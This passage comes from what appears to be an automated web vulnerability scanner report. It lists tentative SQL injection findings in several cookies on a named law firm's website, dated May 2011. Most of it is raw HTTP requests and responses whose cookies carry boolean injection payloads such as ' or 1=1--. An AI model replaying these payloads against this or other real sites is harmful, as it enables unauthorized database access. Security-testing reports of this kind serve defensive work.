Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A2718225561'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.56. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 74472467'%20or%201%3d1--%20 and 74472467'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee574472467'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 17:52:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee574472467'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.57. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 19197715'%20or%201%3d1--%20 and 19197715'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee519197715'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 17:52:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee519197715'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.58. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 35384051'%20or%201%3d1--%20 and 35384051'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee535384051'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 17:52:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee535384051'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 15063829'%20or%201%3d1--%20 and 15063829'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515063829'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 17:52:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515063829'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.60. http://www.pillsburylaw.com/index.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 22027432%20or%201%3d1--%20 and 22027432%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953722027432%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 16:45:59 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
